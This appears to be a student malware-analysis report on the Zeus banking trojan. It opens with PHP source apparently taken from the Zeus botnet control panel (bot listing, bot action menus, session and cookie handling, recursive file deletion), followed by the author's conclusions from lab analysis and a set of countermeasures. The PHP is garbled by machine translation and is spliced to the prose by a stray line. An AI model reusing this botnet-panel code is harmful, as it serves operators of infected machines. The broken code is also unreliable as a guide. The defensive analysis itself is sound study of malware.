function BotnetsToListBox ($ current_botnet, $ adv_query)
{ $ Adv_query = htmlentities_ex ($ adv_query);
$ Botnets = str_replace (array ('{NAME}', '{WIDTH}'), array ('botnet', 'auto'), THEME_DIALOG_ITEM_LISTBOX_BEGIN).
Str_replace (array ('{VALUE}', '{TEXT}') , array ('', LNG_BOTNET_ALL), THEME_DIALOG_ITEM_LISTBOX_ITEM);
if (($ r = @ mysql_query ('SELECT DISTINCT botnet FROM botnet_list'))) while (($ m = @ mysql_fetch_row ($ r))) if ($ m [0]!
='')
{ $ Botnets .= str_replace (array ('{VALUE}', '{TEXT}'),
array (htmlentities_ex (urlencode ($ m [0])), htmlentities_ex (mb_substr ($ m [0], 0, BOTNET_MAX_CHARS))),
strcmp ($ current_botnet, $ m [0]) === 0? THEME_DIALOG_ITEM_LISTBOX_ITEM_CUR: THEME_DIALOG_ITEM_LISTBOX_ITEM);
}
$ Botnets .= THEME_DIALOG_ITEM_LISTBOX_END. ''.
str_replace (array ('{TEXT}', '{JS_EVENTS}'),
array (LNG_BOTNET_APPLY, 'onclick = "var botnet = document.getElementById (\' botnet \ '); window.location = \''. QUERY_STRING_HTML. $ adv_query.' & botnet = \ '+ botnet.options [botnet.selectedIndex ]. value ;"'),
THEME_DIALOG_ITEM_ACTION);
return $ botnets; }
/ * Creating a table with spisokm page numbers.
IN $ total_pages - int, kolichetsvo pages. IN $ current_page - int, the current page.
IN $ js - string, JavaScript for the event onclick, where {P} - the page number.
Return - string, a list of pages.
* /
function ShowPageList ($ total_pages, $ current_page, $ js) {
$ List = array ();
$ Visible_pages = 5, / / radius of the visible pages.
/ / We count the visible page. $ Min_visible = $ current_page - $ visible_pages;
$ Max_visible = $ current_page + $ visible_pages;
if ($ min_visible <1) $ max_visible -= $ min_visible - 1, / /! Adds chisilo <1
else if ($ max_visible> $ total_pages) $ min_visible -= ($ max_visible - $ total_pages); / / Reduce the number of which appeared
over $ total_pages.
$ Q_min = false;
$ Q_max = false;
for ($ i = 1; $ i <= $ total_pages; $ i + +)
{ / / Tekschaya page.
if ($ i == $ current_page) $ list [] = array ($ i, 0);
else {
/ / Invisible page.
if ($ i! = 1 & & $ i! = $ total_pages & & ($ i <$ min_visible | | $ i> $ max_visible))
{
if ($ i <$ min_visible & & $ q_min == false) {
$ List [] = array (0, 0);
$ Q_min = true; }
else if ($ i> $ max_visible & & $ q_max == false)
{ $ List [] = array (0, 0);
$ Q_max = true;
} }
/ / Visible pages.
else $ list [] = array ($ i, str_replace ('{P}', $ i, $ js)); }
}
return ThemePageList ($ list,
$ Current_page> 1? str_replace ('{P}', 1, $ js): 0
$ Current_page> 1? str_replace ('{P}', $ current_page - 1, $ js): 0
$ Current_page <$ total_pages? str_replace ('{P}', $ total_pages, $ js): 0
$ Current_page <$ total_pages? str_replace ('{P}', $ current_page + 1, $ js): 0
); }
/ * Creating a menu for JavaScript from $ _BOT_MENU.
IN $ name - string, name of the menu.
Return - string, a JavaScript variable with soedrzhimym menu.
* / function GetBotJSMenu ($ name)
{
global $ _BOT_MENU; $ Output ='';
$ I = 0;
foreach ($ _BOT_MENU as $ item)
{
if ($ i + +! = 0) $ output .= ','; if ($ item [0] === 0) $ output .= '[0]';
else $ output .= '[\''. addjsslashes (htmlentities_ex ($ item [1 ])).' \', \''. addjsslashes (QUERY_SCRIPT_HTML. '? botsaction ='.
htmlentities_ex (urlencode ($ item [0] )).'& bots [] = $ 0 $').' \ ']'; }
return 'var'. $ name. ' = ['. $ Output .'];'; }
/ * Creating popap menu for the bot.
IN $ botid - string, the bot ID. Apply htmlentities_ex or urlencode not.
IN $ meuname - string, name of the menu. Simply put the name in JavaScript permennoy created through GetBotJSMenu.
Return - string, popap menu
* /
function BotPopupMenu ($ botid, $ menuname)
{
if (! isset ($ GLOBALS ['_next_bot_popupmenu__']))$ GLOBALS [' _next_bot_popupmenu__ '] = 100; return str_replace (array ('{ID}', '{MENU_NAME}', '{BOTID_FOR_URL}', '{BOTID}'),
array ($ GLOBALS ['_next_bot_popupmenu__']++, $ menuname, htmlentities_ex (urlencode ($ botid)), htmlentities_ex
($ botid)), THEME_POPUPMENU_BOT);
}
/ *
Sozdnie header column sort to lie.
IN $ text - string, name of the column.
IN $ col_id - int, ID column. IN $ num - bool, true - column is used to display numbers, false - column is used for text output.
Retrurn - string, column. * /
function WriteSortColumn ($ text, $ col_id, $ num)
{ global $ _SORT_ORDER, $ _SORT_COLUMN_ID;
if ($ num) $ theme = $ _SORT_COLUMN_ID == $ col_id? ($ _SORT_ORDER == 0? THEME_LIST_HEADER_R_SORT_CUR_ASC: THEME_LIST_HEADER_R_SORT_CUR_DESC):
THEME_LIST_HEADER_R_SORT;
else $ theme = $ _SORT_COLUMN_ID == $ col_id? ($ _SORT_ORDER == 0? THEME_LIST_HEADER_L_SORT_CUR_ASC: THEME_LIST_HEADER_L_SORT_CUR_DESC): THEME_LIST_HEADER_L_SORT;
return str_replace ( array ('{COLUMNS_COUNT}', '{URL}', '{JS_EVENTS}', '{TEXT}', '{WIDTH}'),
array (1, '#', 'onclick = "return SetSortMode ('. $ col_id. ','.($_ SORT_COLUMN_ID == $ col_id? ($ _SORT_ORDER
== 0? 1: 0): $ _SORT_ORDER).') "', $ text,' auto '),
$ Theme
);
}
/ *
JS code to change the sort order.
IN $ url - string, url.
Retutn - string, js-code.
* /
function JSSetSortMode ($ url) {
return "function SetSortMode (mode, ord) {window.location = '{$ url} & smode =' + mode + '& sord =' + ord; return false;} \ r \ n";
}
/ *
The code for the JS to initialize the XMLHttpRequest.
IN $ var - string, name permennoy for the object.
Retutn - string, js-code.
* /
function JSXMLHttpRequest ($ var) {
return
"Try {{$ var} = new ActiveXObject ('Msxml2.XMLHTTP');}". "Catch (e1)".
"{".
"Try {{$ var} = new ActiveXObject ('Microsoft.XMLHTTP');}". "Catch (e2) {{$ var} = false;}".
"}". "If (! {$ Var} & & typeof XMLHttpRequest! = 'Undefined'){{$ var} = new XMLHttpRequest ();}".
"If (! {$ Var}) alert ('ERROR: Failed to create XMLHttpRequest .');";
}
/ *
JS code for the mass control metakmi type checkbox.
IN $ form - string, name of the form for processing.
IN $ cb - string, the main checkbox. IN $ cb - string, name of dependent checkbox'ov.
Retutn - string, js-code. * /
function JSCheckAll ($ form, $ cb, $ arr)
{ return
"Function CheckAll (){".
"Var bl = document.forms.namedItem ('{$ form}'). Elements;".
"Var ns = bl.namedItem ('{$ cb}'). Checked;".
"For (var i = 0; i <bl.length; i + +) if (bl.item (i). Name == '{$ arr}') bl.item (i). Checked = ns;". "} \ R \ n";
}
/ *
Gets the sort order of the GET-request.
IN $ sm - array, list dosutpnyh sorts.
Return - string, URL of the current kotsovka stortirovki. * /
function AssocateSortMode ($ sm)
{ $ GLOBALS ['_SORT_COLUMN'] = $ sm [0] / / Column
$ GLOBALS ['_SORT_COLUMN_ID'] = 0; / / ID column.
$ GLOBALS ['_SORT_ORDER'] = 0, / / Direction, 0 = ASC, 1 = DESC
if (! empty ($ _GET ['smode']) & & is_numeric ($ _GET ['smode']))
{
if (isset ($ sm [$ _GET ['smode']]))
{
$ GLOBALS ['_SORT_COLUMN'] = $ sm [$ _GET ['smode']]; $ GLOBALS ['_SORT_COLUMN_ID'] = intval ($ _GET ['smode']);
}
}
if (! empty ($ _GET ['sord']) & & is_numeric ($ _GET ['sord']))$ GLOBALS [' _SORT_ORDER '] = $ _GET [' sord '] == 1? 1: 0;
if ($ GLOBALS ['_SORT_COLUMN_ID']! == 0 | | $ GLOBALS ['_SORT_ORDER']! == 0) return '& smode ='. $ GLOBALS
['_SORT_COLUMN_ID'].'& sord ='. $ GLOBALS [' _SORT_ORDER '];
return''; }
/ * Adding data to the current sort of form.
* /
function AddSortModeToForm () {
return str_replace (array ('{NAME}', '{VALUE}'), array ('smode', $ GLOBALS ['_SORT_COLUMN_ID']),
THEME_FORM_VALUE). str_replace (array ('{NAME}', '{VALUE}'), array ('sord', $ GLOBALS ['_SORT_ORDER']), THEME_FORM_VALUE);
}
/ *
Getting a list of all directories.
IN $ path - string, path to search.
Return - array, list diretory, or false otherwise.
* / function getdirs ($ path)
{
$ R = array (); if (($ dh = @ opendir ($ path)) === false) return false;
else
{
while (($ file = @ readdir ($ dh))! == false) if (strcmp ($ file, '.')! == 0 & & strcmp ($ file,'..')! == 0 & & @ is_dir ($ path .'/'.$ file))
$ r [] = $ file;
@ Closedir ($ dh); }
return $ r; }
/ * Deleting files and folders.
IN $ path - string, full path.
Return - true - if the path is successfully removed; false - if an error occurs.
* /
function ClearPath ($ path) {
@ Chmod ($ path, 0777);
if (@ is_dir ($ path))
{
if (($ dh = @ opendir ($ path))! == false) {
while (($ file = readdir ($ dh))! == false) if (strcmp ($ file, '.')! == 0 & & strcmp ($ file,'..')! == 0)
{ if (! ClearPath ($ path .'/'.$ file)) return false;
}
@ Closedir ($ dh); }
if (! @ rmdir ($ path)) return false;
}
else if (is_file ($ path))
{
if (! @ unlink ($ path)) return false; }
return true; }
/ * Otimiziruet menu, removing items from it zapreshennye.
IN OUT $ menu - array, the menu for processing. IN $ allow_fsep - bool, keep the top separator.
* /
function OptimizeMenu (& $ menu, $ save_fsep) {
global $ _USER_DATA;
foreach ($ menu as $ key => $ item) foreach ($ item [2] as $ r) if (empty ($ _USER_DATA [$ r])) {unset ($ menu [$ key]); break;}
/ / Remove unnecessary separators. $ Sep = -1;
$ I = 0;
foreach ($ menu as $ key => $ item) {
if ($ item [0] === 0)
{ if ($ i == 0 & &! $ save_fsep) unset ($ menu [$ key]);
else if ($ sep! == -1) unset ($ menu [$ sep]);
$ Sep = $ key; }
else {
$ Sep = -1;
$ I + +; }
}
if ($ sep! == -1) unset ($ menu [$ sep]);
}
////////////////////////////////////////////////// /////////////////////////////
/ / Session management.
////////////////////////////////////////////////// /////////////////////////////
/ *
Capture Session * /
$ _SESSIONIN = 0;
function LockSession ()
{
global $ _SESSIONIN; if ($ _SESSIONIN == 0)
{
@ Session_set_cookie_params (SESSION_LIVETIME, CP_HTTP_ROOT); @ Session_name (COOKIE_SESSION);
@ Session_start ();
} $ _SESSIONIN + +;
}
/ *
Exemption session
* / function UnlockSession ()
{
global $ _SESSIONIN; if ($ _SESSIONIN> 0 & & - $ _SESSIONIN == 0) session_write_close ();
}
/ *
Destroying session
* / function UnlockSessionAndDestroyAllCokies ()
{
global $ _SESSIONIN; $ _SESSIONIN = 0;
if (isset ($ _SESSION)) foreach ($ _SESSION as $ k => $ v) unset ($ _SESSION [$ k]);
@ Session_unset (); @ Session_destroy ();
@ Setcookie (COOKIE_SESSION,'', 0, CP_HTTP_ROOT); @ Setcookie (COOKIE_USER,'', 0, CP_HTTP_ROOT);
@ Setcookie (COOKIE_PASS,'', 0, CP_HTTP_ROOT);
} ?>
The Answer is to use the zse.exe to see infection and fix it
Conclusion
From the data collection of running the Zeus system configuration for approximately
ten hours there was a noticeable amount of traffic from the impacted infected host to the web
server. The goals were achieved to a level that is satisfactory to answer some basic questions
of what the Zeus does. The questions of how to detect what is going on within the infected
host, what security levels configurations of XP were impacted, how easy Zeus is to setup and
use, and what are the possible countermeasure to use to prevent infection.
From inspection of the Zeus Ŗcp.phpŗ and Ŗgate.phpŗ files along with the Ŗzse.exeŗ
configuration setup file you can see many of the data gathering methods and functions. This
will show evidences of data capturing and that data transfers being made from a host to a web
server. From the Wireshark summary, data transfer of packets is occurring from the infected
host with the web server. Those packets do not insert data into the web server’s MySQL
database however that is a minor detail which doesn’t hamper the intent of this experiment. It
is likely due toa missing php file or a matter of a required help file to correct that missing link.
In the Ŗcp.phpŗ and Ŗgate.phpŗ files it is not hard to see the relationships of data repository
actions that are suppose to take place on the web server.
In the IDA Pro results we see from the Ŗbt.exeŗ and Ŗzse.exeŗ files there are many
functions it will be running on the infected host. Somewhere in the execution of the Ŗbt.exeŗ a
spawn activity occurs to create another executable called Ŗsdra64.exe.ŗ Also the Log (user.ds)
and Config (local.ds) files were generated in a created directory of Ŗlowsecŗ which assist the
data collections process. The output of Promon is a very detailed and shows the actual
changes that occur on the infected host. I experienced a continuous rebooting of the infected
host. It would not enter back into the regular boot process. It would display a blue-screen
error. This is shown in screenshots in during the execution of the attack of the Ŗbt.exeŗ on the
infected host. The conclusions of the characteristics that Dell SecureWorks list can be verified
with the output files InCtrl5 and Procmon. However some claims they made I did not validate
such as FTP and POP accounts being stolen but my system had neither configured.
The tools used to detect this complex Zeus malware program were selected at the
beginning and during the examination of the infected host. The assignments over the
coursework provided the necessary tools and techniques to properly assess the malware
portion running on the infected host. The most useful one was InCtrl5. Promon in junction
with WinMerge Ŗbeforeŗ and Ŗafterŗ shots was very detailed but required a lot of time
compared to InCtl5 which was quick and pretty accurate in recovering all of the correct
information as seen in the media articles. The given malware tool utility Ŗzse.exeŗ will detect
and clean the virus from the infected host. It will show a brief summary of the key files that
are found on infected systems but not everything it causes. The appreciation of how complex
Zeus is can be seen is the dissection of the assembly language code traced by IDA Pro. With
more practice and unlimited amount of time one could describe the code with more precision
than what the other tools were able to report however it would be overkill for this experiment.
IDA Pro would be a nice tool to be a master at when doing this kind of exercise over and over
in order to get to more exact and refine details out of it. Wireshark provided the simple
relationship amongst the infected host and the web server. The payloads were encrypted
(assuming this since there wasn’t any plaintext) with methods (Zeus uses RCA encryption)
within and the Ŗzse.exeŗ configuration and web install Ŗindex.php.ŗ Both executions required
the public key to process the automatic configurations. Wireshark shows the traffic type was
mainly http connections and many different ports were attempted. We could use some
cryptography tools in this experiment and see if we could reveal the payloads since we do
have the encryption mechanism and public key. We would need to discover the private key of
the Zeus program. That process could take a lot of work and may not be possible or feasible.
The security levels of the XP systems were simple to configure and was basic to
complex. There was the standard build without a service pack and no AV then a moderate
protected XP and then to the highest possible harden XP system. The security flaws were not
found on the lowest baseline of XP and no AV was installed. So something changed from the
later builds of XP that have service pack 3 or higher to allow an open vulnerability related to
what Zeus could penetrate through. All the systems with AV were capable of detecting and
rejecting this version of Zeus however media literature shows that further developed Zeus
platforms will elude AV. The mechanism which would allow this is to be successful is based
on the random encryption practices that Zeus has been implementing.
The first line of defense was AV. I did not anticipate that the AV would prevent the
executable from running but it does just that. It worked this time but will it later? To improve
upon this experiment I would like to setup a different trial set identical to this one but
subtracting the known suspects that will refuse the infection based on having AV installed.
The next layer of defense after AV is having full updates and removing unused services and
closing unused ports. After that you can take another step and secure and restrict system level
scripts and executables that can operate at the system level. How well would the DoD system
at low and high classification protection without the AV installed do against the Zeus attack?
The ease of use in my experience with this program is a rating of Ŗdifficultŗ to
configure and use. Many software vendors charge you for product support usually do so
because their product is not as intuitive as running office suite products. I have experience
with web development and know php and MySQL well enough to develop a working site that
is useful. This type of project was not out of my field of expertise. It was hard to determine if
you are missing a critical file. There weren’t any help instructions to tweek possible web
service configurations. There weren’t any help files or forums to guide you through the
process. I did not have an easy time locating a working copy of the software and did get a
version that was not the original one or the latest one. You have to pay for it all and find out
where to pay to. The common files that I had were from a basic template or modified
experimental one. I can’t be sure either way. There wasn’t any MD5 hash to compare to see
what I was suppose to be working with and if my set of files were altered or not. I have done
the best with what I found. Getting it all going is difficult.
After you get over the stumps the rest of it is easy. It does have that kiddie script that
builds the required functioning executables and has the self configuring database along with
the ready to go website server. The website worked but it was an empty shell since the data
never populated. Did I have it configured right or wrong or is there a time delay before the
data collector sends it at Ŗmŗ minutes or Ŗhŗ hours later. I gave it almost ten hours and saw no
data online from the command site.
The countermeasures to prevent this infection in this case scenario are simple. Use a
good AV and keep the signature files up to date. However the future implementation of Zeus
will defeat or has defeated AV. Other steps must be taken to protect from host from infection.
Dell SecureWorks had some good advice in how to protect yourself from being a victim to the
goal of Zeus stealing your banking information. SecureWorks suggest Ŗbusinesses and home
users carry out online banking and financial transactions on isolated workstations that
are not used for general Internet activities, such as web browsing and reading email
which could increase the risk of infection.” For networks and home users the solutions
will vary.
To combat malware you need an infrastructure with built in security. There is a
lot of sensitive data out there. How useful is the data if the data can’t beviewed? It would
be worthless and the effort would be wasted. I agree with the posting in the forum from
our class related to the Germany citation10 that would impose a fine to users that didn’t
secure their wireless routers if their router was to be used as the dummy network to
commit a crime. Along similar lines the more doors we close or secure the less
opportunity there is out there for criminal to go through. Pretty Good Privacy (PGP)11 is
free and not easy to configure but works well to secure data files and emails. In advance
firewall appliances or software firewalls you should implement a backhole list or a proxy
that filtered known websites and domains of Zeus and denied access to them. There is a
10 http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/
http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning 11
http://www.openpgp.org/
supported list for Zeus called “abuse.ch ZeuS removal list.12” The proper security
architectures need to be designed and used throughout the many networks to prevent
the bots from spreading and the bots from collecting useful information.
The current Microsoft OS is not encrypting things in the registry and exposing a
lot of system information. Operating systems should be designed to switch to an isolated
read-only state for sensitive web browsing or banking which would prevent storage to
happen locally to the disk the OS resides on. Key-loggers and screenshots being taken
from rogue malware programs that inject themselves to root system files. There reside
there and are usually capturing and storing from users interative actions on the system.
If the the write permsission don’t exist then those files can never been intercepted and
executed upon to be sent out to a master server. We need a new Microsoft that hasn’t
had their source code sold to foreign countries and reversed engineered by hackers. The
next generation of operating systems needs to have a much greater security as of part of
core of the product.
The most impact to prevention of viruses, malware, Trojans, and phishing
schemes is proper network security personnel training. Home users may not get this
annual requirement that corporations usually mandate. In addition to home users are
those small business such as dental and doctor offices that don’t employ security in their
policies for network usage. Zeus works with user interaction for installation. When the
user agrees to click yes and run to install the Zeus begins its process. Alternatively
12
https://zeustracker.abuse.ch
perhaps some phishing scheme is devised to trick users to enter their information which
activates the Zeus program. User training is important but if the user is tricked and their
files are encrypted to appropriate levels then the data will be useless to the malware.
A solution today that prevents malware from the dummy user is to always use a
Linux version operating system and booting from the CD-Rom option which is a read
only selection. You know for certain when you load the CD that your system root is not
changed and not affected by malware since malware can’t be installed on the CD device.
You know when you are browsing the web and banking that you don’t have additional
services in the background tracking your activity and sending it to a malware bot for
further malicious activity.
References
DoD Gold Disk
http://www.disa.mil/services/ia.html
Retina
http://www.eeye.com/Retina
IDA Pro5
http://www.hex-rays.com/idapro/
Wireshark
http://www.wireshark.org
Dell published an article on Zeus on March 11, 2010
http://www.secureworks.com/research/threats/zeus/?threat=zeus
Utilities from Sysinternals Suite
http://technet.microsoft.com/en-us/sysinternals/bb842062
InCtrl5
http://simontodd.com/2010/02/inctrl-5-application-analysys-tool-download-and-enjoy/
WinMerge
http://winmerge.org/
verclsid.exe is an open MS vulnerability
http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx
abuse.ch ZeuS removal list
https://zeustracker.abuse.ch
Germany Wireless Fine
http://www.msnbc.msn.com/id/42740201/ns/technology_and_science-wireless/
http://news.yahoo.com/s/ap/20110424/ap_on_hi_te/us_wi_fi_warning
Good Privacy (PGP)
http://www.openpgp.org/